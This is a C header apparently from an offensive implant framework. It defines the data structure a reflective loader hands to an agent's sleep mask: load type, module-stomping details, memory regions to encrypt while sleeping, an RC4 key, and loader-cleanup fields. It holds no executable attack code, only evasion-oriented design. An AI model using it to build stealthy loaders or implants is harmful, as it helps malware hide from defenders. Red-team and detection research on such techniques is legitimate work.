#ifndef UDRL_USER_DATA_H
#define UDRL_USER_DATA_H

#include <windows.h>

/* ──────────────────────────────────────────────────────────────────────
 * User Data - Bridge between UDRL loader and the agent/sleep mask.
 *
 * The UDRL populates this structure before transferring execution to
 * the agent. It describes how and where the agent was loaded so the
 * sleep mask can properly encrypt/decrypt the right memory regions
 * and clean up artifacts on exit.
 *
 * This structure is placed at a known offset relative to the agent
 * image so the sleep mask can locate it.
 * ────────────────────────────────────────────────────────────────────── */

#define UDRL_MAGIC  0x5442525354ULL   /* "STRBT" */

/* How the UDRL loaded the agent */
#define LOAD_TYPE_VIRTUAL_ALLOC   0   /* Standard VirtualAlloc */
#define LOAD_TYPE_MODULE_STOMP    1   /* Loaded into sacrificial DLL .text */

/* Memory region descriptor - used by the sleep mask to know what to encrypt */
typedef struct _UDRL_REGION {
    PVOID  base;
    DWORD  size;
    DWORD  protect;     /* Original protection flags */
} UDRL_REGION;

#define MAX_UDRL_REGIONS  8

typedef struct _UDRL_USER_DATA {
    UINT64        magic;              /* UDRL_MAGIC - sanity check */
    DWORD         load_type;          /* LOAD_TYPE_* */

    /* Agent image location (where the DLL/shellcode was mapped) */
    PVOID         agent_base;         /* Base of mapped agent image */
    DWORD         agent_size;         /* Total size of mapped image */

    /* Original loader location (for cleanup) */
    PVOID         loader_base;        /* Base of initial allocation (UDRL + payload) */
    DWORD         loader_size;        /* Size of initial allocation */

    /* Module stomping details */
    HMODULE       stomped_module;     /* Handle to sacrificial DLL (if module stomped) */
    PVOID         stomped_text_base;  /* Base of stomped .text section */
    DWORD         stomped_text_size;  /* Size of .text section */

    /* Memory regions to mask during sleep */
    UDRL_REGION   regions[MAX_UDRL_REGIONS];
    DWORD         region_count;

    /* RC4 key for sleep masking (generated by loader) */
    BYTE          rc4_key[16];

    /* Reserved for future use */
    BYTE          reserved[64];
} UDRL_USER_DATA;

#endif /* UDRL_USER_DATA_H */
